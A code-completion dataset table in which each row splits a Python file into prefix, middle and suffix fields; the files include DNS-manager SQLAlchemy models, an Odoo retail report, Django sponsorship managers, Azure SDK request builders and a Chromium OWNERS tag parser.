repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
kkstu/DNStack
|
model/models.py
|
Python
|
mit
| 3,358
| 0.014627
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
from sqlalchemy import Column, Integer, SmallInteger, VARCHAR, or_, and_
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = Column(Integer,primary_key=True,autoincrement=True)
username = Column(VAR
|
CHAR(32),nullable=False,unique=True)
password = Column(VARCHAR(64),nullable=False)
password_key = Column(VARCHAR(12),nullable=False,default='a1b2c3d4e5f6')
email = Column(VARCHAR(32),nullable=False,unique=True)
phone = Column(VARCHAR(32),nullable=True)
nickname = Column(VARCHAR(32),nullable=True)
gender = Column(SmallInteger,nullable=True) # 性别
dept = Column(VARCHAR(32),nullable=True) # 部门
role = Column(VARC
|
HAR(32),nullable=True)
lang = Column(VARCHAR(12),nullable=False,default='zh_CN')
login_count = Column(Integer,nullable=False,default=0)
login_time = Column(Integer,nullable=True)
login_ua = Column(VARCHAR(600),nullable=True)
login_ip = Column(VARCHAR(64),nullable=True)
login_location = Column(VARCHAR(32),nullable=True)
create_time = Column(Integer,nullable=True)
update_time = Column(Integer,nullable=True)
status = Column(SmallInteger,nullable=False,default=1)
class Domain(Base):
__tablename__ = 'domain'
id = Column(Integer,primary_key=True,autoincrement=True)
zone = Column(VARCHAR(128),nullable=False,unique=True)
gid = Column(Integer,nullable=True)
comment = Column(VARCHAR(256), nullable=True)
record_count = Column(Integer,nullable=False,default=0)
create_time = Column(Integer,nullable=True)
update_time = Column(Integer,nullable=True)
status = Column(SmallInteger, nullable=False, default=1)
class Groups(Base):
__tablename__ = 'groups'
id = Column(Integer,primary_key=True,autoincrement=True)
name = Column(VARCHAR(128),nullable=False,unique=True)
domain_count = Column(Integer, nullable=False, default=0)
class Record(Base):
__tablename__ = 'record'
id = Column(Integer,primary_key=True,autoincrement=True)
zone = Column(VARCHAR(128), nullable=False)
host = Column(VARCHAR(128), nullable=False)
type = Column(VARCHAR(12), nullable=False)
data = Column(VARCHAR(128), nullable=False)
ttl = Column(Integer, nullable=False,default=600)
mx_priority = Column(Integer, nullable=True)
refresh = Column(Integer, nullable=True)
retry = Column(Integer, nullable=True)
expire = Column(Integer, nullable=True)
minimum = Column(Integer, nullable=True)
serial = Column(Integer, nullable=True)
resp_person = Column(VARCHAR(64), nullable=True)
primary_ns = Column(VARCHAR(64), nullable=True)
comment = Column(VARCHAR(256), nullable=True)
create_time = Column(Integer, nullable=True)
update_time = Column(Integer, nullable=True)
status = Column(SmallInteger, nullable=False, default=1)
class Options(Base):
__tablename__ = 'options'
id = Column(Integer,primary_key=True,autoincrement=True)
name = Column(VARCHAR(128), nullable=False,unique=True)
value = Column(VARCHAR(500), nullable=True)
default_value = Column(VARCHAR(500), nullable=True)
category = Column(VARCHAR(32), nullable=False,default='default')
update_time = Column(Integer, nullable=True)
|
nfqsolutions/pylm
|
examples/parallel/worker.py
|
Python
|
agpl-3.0
| 297
| 0.006734
|
from pylm.servers import Worker
from uuid import uuid4
import sys
class MyWorker(Worker):
de
|
f foo(self, message):
return self.name.encode('utf-8') + b' processed ' + message
server = MyWorker(str(uuid4()), 'tcp://127
|
.0.0.1:5559')
if __name__ == '__main__':
server.start()
|
davidsetiyadi/draft_python
|
new_edukits/edukits_total_retail_report.py
|
Python
|
gpl-3.0
| 24,578
| 0.033282
|
import time
from datetime import datetime
from pytz import timezone
from dateutil.relativedelta import relativedelta
import openerp
from openerp.report.interface import report_rml
from openerp.tools import to_xml
from openerp.report import report_sxw
from datetime import datetime
from openerp.tools.translate import _
from openerp.osv import osv, fields, orm, fields
import math
import re
class edukits_total_retail(report_rml):
def create_xml(self,cr,uid,ids,datas,context={}):
def _thousand_separator(decimal,amount):
if not amount:
amount = 0.0
if type(amount) is float :
amount = str(decimal%amount)
else :
amount = str(amount)
if (amount == '0'):
return ' '
orig = amount
new = re.sub("^(-?\d+)(\d{3})", "\g<1>.\g<2>", amount)
if orig == new:
return new
else:
return _thousand_separator(decimal,new)
pool = openerp.registry(cr.dbname)
order_obj = pool.get('sale.order')
wh_obj = pool.get('stock.warehouse')
session_obj = pool.get('pos.session')
user_obj = pool.get('res.users')
users = user_obj.browse(cr,uid,uid)
warehouse_ids = datas['form']['warehouse_ids'] or wh_obj.search(cr, uid, [])
company = users.company_id
rml_parser = report_sxw.rml_parse(cr, uid, 'edukits_total_retail', context=context)
rml = """
<document filename="test.pdf">
<template pageSize="(21.0cm,29.7cm)" title="Total Retail Report" author="SGEEDE" allowSplitting="20">
<pageTemplate id="first">
<frame id="first" x1="50.0" y1="0.0" width="500" height="830"/>
</pageTemplate>
</template>
<stylesheet>
<blockTableStyle id="Table1">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="parent_table">
<blockAlignment value="LEFT"/>
<blockLeftPadding start="0,0" length="0.1cm"/>
<blockRightPadding start="0,0" length="0.1cm"/>
<blockTopPadding start="0,0" length="0.15cm"/>
<blockBottomPadding start="0,0" length="0.15cm"/>
</blockTableStyle>
<blockTableStyle id="Table2">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="Table3">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table3_Normal">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<blockTopPadding start="0,0" length="-0.15cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="Table3_PARENT">
<blockAlignment value="CENTER"/>
<blockValign value="TOP"/>
</blockTableStyle>
"""
for warehouse in wh_obj.browse(cr,uid,warehouse_ids):
if warehouse.color:
rml += """
<blockTableStyle id="Table3""" + to_xml(str(warehouse.color.name)) + """">
<blockBackground colorName="#"""+ to_xml(str(warehouse.color.color)) + """" start="0,0" stop="0,-1"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<blockTopPadding start="0,0" length="0.1cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" st
|
art="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
"""
if not warehouse.color:
rml += """
<blockTableStyle id="Table3False">
<blockAlignment value="LEFT"/>
<bl
|
ockValign value="TOP"/>
<blockTopPadding start="0,0" length="0.1cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
"""
rml += """
<blockTableStyle id="Table3_LINE">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="2,0" stop="2,3"/>
</blockTableStyle>
<blockTableStyle id="Table3_LINE2">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table3_LINE2W">
<blockBackground colorName="white"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table1_line">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="2,0"/>
</blockTableStyle>
<blockTableStyle id="Table1_lines">
<blockBackground colorName="white"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="2,0"/>
</blockTableStyle>
<initialize>
<paraStyle name="all" alignment="justify"/>
</initialize>
<paraStyle name="P1" fontName="Helvetica" fontSize="9.0" leading="11" alignment="CENTER" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P2" fontName="Helvetica-Bold" fontSize="14.0" leading="17" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P3" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P4" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P5" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P6" fontName="Helvetica" fontSize="9.0" leading="11" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P7" fontName="Helvetica" fontSize="9.0" leading="11" alignment="CENTER" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P8" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P9" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P10" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P11" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P12" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P13" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P14" fontName="Helvetica-Bold" fontSize="12.0" leading="11" alignment="LEFT" spaceBefore="0.0" spaceAfter="1.0"/>
<paraStyle name="P15" textColor="black" fontName="Helvetica" fontSize="10
|
sinotradition/meridian
|
meridian/acupoints/yangfu23.py
|
Python
|
apache-2.0
| 242
| 0.033898
|
#!/usr/bin/python
#coding=utf-8
'''
@aut
|
hor: sheng
@license:
'''
SPELL=u'yángfǔ'
CN=u'阳辅'
NAME=u'yangfu23'
CHANNEL='gallbladder'
CHANNEL_FULLNAME='GallbladderChannelofFoot-Shaoyang'
SEQ='GB38'
if __name__ == '__main_
|
_':
pass
|
Revolution1/ID_generator
|
generator.py
|
Python
|
mit
| 1,559
| 0
|
def is_tl(data):
return isinstance(data, tuple) or isinstance(data, list)
def get_depth(data):
'''
:type data: list or tuple
get the depth of nested list
'x' is 0
['x', 'y'] is 1
['x', ['y', 'z'] is 2
'''
if is_tl(data):
depths = []
for i in data:
depths.append(1+get_depth(i))
return max(depths)
else:
return 0
def reduce_d2(a, b):
'''
generate all combination from a, b
'''
if not is_tl(a):
a = [a]
if not is_tl(b):
b = [b]
result = []
for i in a:
for j in b:
result.append('%s%s' % (i, j))
return result
def _generate_d2(data):
return reduce(reduce_d2, data)
def _generate(data):
'''
recursively generate the list
'''
depth = get_depth(data)
if depth > 2:
temp = []
for i in data:
temp.append(_generate(i))
return _generate(temp)
elif depth == 2:
return _generate_d2(data)
elif depth == 1:
return data
else:
return [str(data)]
def generate(data):
'''
:rtype: list of str
:type data: list or tuple
generate the final result
'''
result = _generate(data)
# fix if initial data's depth == 1
if result
|
== data:
result = _generate_d2(data)
return result
if __name__ == '__main__':
nested = [range(2), [range(3), range(4)]]
print(generate(nested))
print(generate([1, [2, 3]]))
print(generate([1, 2]))
print(generate(1))
| |
python/pythondotorg
|
sponsors/models/managers.py
|
Python
|
apache-2.0
| 4,837
| 0.002067
|
from django.db.models import Count
from ordered_model.models import OrderedModelManager
from django.db.models import Q, Subquery
from django.db.models.query import QuerySet
from django.utils import timezone
from polymorphic.query import PolymorphicQuerySet
class SponsorshipQuerySet(QuerySet):
def in_progress(self):
status = [self.model.APPLIED, self.model.APPROVED]
return self.filter(status__in=status)
def approved(self):
return self.filter(status=self.model.APPROVED)
def visible_to(self, user):
contacts = user.sponsorcontact_set.values_list('sponsor_id', flat=True)
status = [self.model.APPLIED, self.model.APPROVED, self.model.FINALIZED]
return self.filter(
Q(submited_by=user) | Q(sponsor_id__in=Subquery(contacts)),
status__in=status,
).select_related('sponsor')
def finalized(self):
return self.filter(status=self.model.FINALIZED)
def enabled(self):
"""Sponsorship which are finalized and enabled"""
today = timezone.now().date()
qs = self.finalized()
return qs.filter(start_date__lte=today, end_date__gte=today)
def with_logo_placement(self, logo_place=None, publisher=None):
from sponsors.models import LogoPlacement, SponsorBenefit
feature_qs = LogoPlacement.objects.all()
if logo_place:
feature_qs = feature_qs.filter(logo_place=logo_place)
if publisher:
feature_qs = feature_qs.filter(publisher=publisher)
benefit_qs = SponsorBenefit.objects.filter(id__in=Subquery(feature_qs.values_list('sponsor_benefit_id', flat=True)))
return self.filter(id__in=Subquery(benefit_qs.values_list('sponsorship_id', flat=True)))
def includes_benefit_feature(self, feature_model):
from sponsors.models import SponsorBenefit
feature_qs = feature_model.objects.all()
benefit_qs = SponsorBenefit.objects.filter(id__in=Subquery(feature_qs.values_list('sponsor_benefit_id', flat=True)))
return self.filter(id__in=Subquery(benefit_qs.values_list('sponsorship_id', flat=True)))
class SponsorContactQuerySet(QuerySet):
def get_primary_contact(self, sponsor):
contact = self.filter(sponsor=sponsor, primary=True).first()
if not contact:
raise self.model.DoesNotExist()
return contact
def filter_by_contact_types(self, primary=False, administrative=False, accounting=False, manager=False):
if not
|
any([primary, administrative, accounting, manager]):
return self.none()
query = Q()
if primary:
query |= Q(primary=True)
if administrative:
query |= Q(administrative=True)
if accounting:
query |= Q(accounting=True)
if manager:
query |= Q(manager=True)
return self.filter(query)
class SponsorshipBenefitManager(OrderedModelManager):
def with_conflicts(self)
|
:
return self.exclude(conflicts__isnull=True)
def without_conflicts(self):
return self.filter(conflicts__isnull=True)
def add_ons(self):
return self.annotate(num_packages=Count("packages")).filter(num_packages=0, a_la_carte=False)
def a_la_carte(self):
return self.filter(a_la_carte=True)
def with_packages(self):
return (
self.annotate(num_packages=Count("packages"))
.exclude(Q(num_packages=0) | Q(a_la_carte=True))
.order_by("-num_packages", "order")
)
class SponsorshipPackageManager(OrderedModelManager):
def list_advertisables(self):
return self.filter(advertise=True)
class BenefitFeatureQuerySet(PolymorphicQuerySet):
def delete(self):
if not self.polymorphic_disabled:
return self.non_polymorphic().delete()
else:
return super().delete()
def from_sponsorship(self, sponsorship):
return self.filter(sponsor_benefit__sponsorship=sponsorship).select_related("sponsor_benefit__sponsorship")
def required_assets(self):
from sponsors.models.benefits import RequiredAssetMixin
required_assets_classes = RequiredAssetMixin.__subclasses__()
return self.instance_of(*required_assets_classes).select_related("sponsor_benefit__sponsorship")
def provided_assets(self):
from sponsors.models.benefits import ProvidedAssetMixin
provided_assets_classes = ProvidedAssetMixin.__subclasses__()
return self.instance_of(*provided_assets_classes).select_related("sponsor_benefit__sponsorship")
class GenericAssetQuerySet(PolymorphicQuerySet):
def all_assets(self):
from sponsors.models import GenericAsset
classes = GenericAsset.all_asset_types()
return self.select_related("content_type").instance_of(*classes)
|
Azure/azure-sdk-for-python
|
sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_06_01/operations/_private_endpoint_connections_operations.py
|
Python
|
mit
| 21,872
| 0.004618
|
# coding=utf-8
# ------
|
--------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# ---------------------------------------------------------
|
-----------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_update_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class PrivateEndpointConnectionsOperations(object):
"""PrivateEndpointConnectionsOperations operations.
|
mtrgroup/django-mtr-utils
|
tests/app/admin.py
|
Python
|
mit
| 908
| 0
|
from django.contrib import admin
from modeltranslation.admin import TabbedTranslationAdmin
from .models import Person, Office, Tag
class PersonAdmin(TabbedTranslationAdmin):
list_display = ('name', 'surname', 'security_level', 'gender')
list_filter = ('security_level', 'tags', 'office', 'name', 'gender')
actions = ['copy_100']
def copy_100(self, request, queryset):
for item in queryset.all():
item.populate()
copy_100.short_description = 'Copy 100 objects with random data'
class PersonStackedInline(admin.TabularInline):
model = Person
extra = 0
class OfficeAdmin(admin.ModelAdm
|
in):
inlines = (PersonStackedInline,)
list_display = ('office', 'address')
class TagAdmin(admin.ModelAdmin):
list_display = ('name',)
admin.site.register(Person, PersonAdmin)
admin.
|
site.register(Office, OfficeAdmin)
admin.site.register(Tag, TagAdmin)
|
nwjs/chromium.src
|
tools/checkteamtags/owners_file_tags.py
|
Python
|
bsd-3-clause
| 7,900
| 0.010633
|
# Copyright (c) 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import posixpath
import re
from collections import defaultdict
def uniform_path_format(native_path):
"""Alters the path if needed to be separated by forward slashes."""
return posixpath.normpath(native_path.replace(os.sep, posixpath.sep))
def parse(filename):
"""Searches the file for lines that start with `# TEAM:` or `# COMPONENT:`.
Args:
filename (str): path to the file to parse.
Returns:
a dict with the following format, with any subset of the listed keys:
{
'component': 'component>name',
'team': 'team@email.here',
'os': 'Linux|Windows|Mac|Android|Chrome|Fuchsia'
}
"""
team_regex = re.compile('\s*#\s*TEAM\s*:\s*(\S+)')
component_regex = re.compile('\s*#\s*COMPONENT\s*:\s*(\S+)')
os_regex = re.compile('\s*#\s*OS\s*:\s*(\S+)')
result = {}
with open(filename) as f:
for line in f:
team_matches = team_regex.match(line)
if team_matches:
result['team'] = team_matches.group(1)
component_matches = component_regex.match(line)
if component_matches:
result['component'] = component_matches.group(1)
os_matches = os_regex.match(line)
if os_matches:
result['os'] = os_matches.group(1)
return result
def aggregate_components_from_owners(all_owners_data, root):
"""Converts the team/component/os tags parsed from OWNERS into mappings.
Args:
all_owners_data (dict): A mapping from relative path to a dir to a dict
mapping the tag names to their values. See docstring for scrape_owners.
root (str): the path to the src directory.
Returns:
A tuple (data, warnings, stats) where data is a dict of the form
{'component-to-team': {'Component1': 'team1@chr...', ...},
'teams-per-component': {'Component1': ['team1@chr...', 'team2@chr...]},
'dir-to-component': {'/path/to/1': 'Component1', ...}}
'dir-to-team': {'/path/to/1': 'team1@', ...}}
, warnings is a list of strings, stats is a dict of form
{'OWNERS-count': total number of OWNERS files,
'OWNERS-with-component-only-count': number of OWNERS have # COMPONENT,
'OWNERS-with-team-and-component-count': number of
OWNERS have TEAM and COMPONENT,
'OWNERS-count-by-depth': {directory depth: number of OWNERS},
'OWNERS-with-component-only-count-by-depth': {directory depth: number
of OWNERS have COMPONENT at this depth},
'OWNERS-with-team-and-component-count-by-depth':{directory depth: ...}}
"""
stats = {}
num_total = 0
num_with_component = 0
num_with_team_component = 0
num_total_by_depth = defaultdict(int)
num_with_component_by_depth = defaultdict(int)
num_with_team_component_by_depth = defaultdict(int)
warnings = []
teams_per_component = defaultdict(set)
topmost_team = {}
dir_to_component = {}
dir_missing_info_by_depth = defaultdict(list)
dir_to_team = {}
for rel_dirname, owners_data in all_owners_data.iteritems():
# Normalize this relative path to posix-style to make counting separators
# work correctly as a means of obtaining the file_depth.
rel_path = un
|
iform_path_format(os.path.relpath(rel_dirname, root))
file_depth = 0 if rel_path == '.' else re
|
l_path.count(posixpath.sep) + 1
num_total += 1
num_total_by_depth[file_depth] += 1
component = owners_data.get('component')
team = owners_data.get('team')
os_tag = owners_data.get('os')
if os_tag and component:
component = '%s(%s)' % (component, os_tag)
if team:
dir_to_team[rel_dirname] = team
if component:
num_with_component += 1
num_with_component_by_depth[file_depth] += 1
dir_to_component[rel_dirname] = component
if team:
num_with_team_component += 1
num_with_team_component_by_depth[file_depth] += 1
teams_per_component[component].add(team)
if component not in topmost_team or file_depth < topmost_team[
component]['depth']:
topmost_team[component] = {'depth': file_depth, 'team': team}
else:
rel_owners_path = uniform_path_format(os.path.join(rel_dirname, 'OWNERS'))
warnings.append('%s has no COMPONENT tag' % rel_owners_path)
if not team and not os_tag:
dir_missing_info_by_depth[file_depth].append(rel_owners_path)
mappings = {
'component-to-team': {
k: v['team'] for k, v in topmost_team.iteritems()
},
'teams-per-component': {
k: sorted(list(v)) for k, v in teams_per_component.iteritems()
},
'dir-to-component': dir_to_component,
'dir-to-team': dir_to_team,
}
warnings += validate_one_team_per_component(mappings)
stats = {'OWNERS-count': num_total,
'OWNERS-with-component-only-count': num_with_component,
'OWNERS-with-team-and-component-count': num_with_team_component,
'OWNERS-count-by-depth': num_total_by_depth,
'OWNERS-with-component-only-count-by-depth':
num_with_component_by_depth,
'OWNERS-with-team-and-component-count-by-depth':
num_with_team_component_by_depth,
'OWNERS-missing-info-by-depth':
dir_missing_info_by_depth}
return mappings, warnings, stats
def validate_one_team_per_component(m):
"""Validates that each component is associated with at most 1 team."""
warnings = []
# TODO(robertocn): Validate the component names: crbug.com/679540
teams_per_component = m['teams-per-component']
for c in teams_per_component:
if len(teams_per_component[c]) > 1:
warnings.append('Component %s has the following teams assigned: %s.\n'
'Team %s is being used, as it is defined at the OWNERS '
'file at the topmost dir'
% (
c,
', '.join(teams_per_component[c]),
m['component-to-team'][c]
))
return warnings
def scrape_owners(root, include_subdirs):
  """Recursively parse OWNERS files for tags.

  Args:
    root (str): The directory where to start parsing.
    include_subdirs (bool): Whether to generate entries for subdirs with no
        own OWNERS files based on the parent dir's tags.

  Returns a dict in the form below.
  {
      '/path/to/dir': {
          'component': 'component>name',
          'team': 'team@email.here',
          'os': 'Linux|Windows|Mac|Android|Chrome|Fuchsia'
      },
      '/path/to/dir/inside/dir': {
          'component': ...
      }
  }
  """
  # Keyed by root-relative directory path; filled top-down as os.walk
  # proceeds, which nearest_ancestor_tag below depends on.
  data = {}
  def nearest_ancestor_tag(dirname, tag):
    """ Find the value of tag in the nearest ancestor that defines it."""
    ancestor = os.path.dirname(dirname)
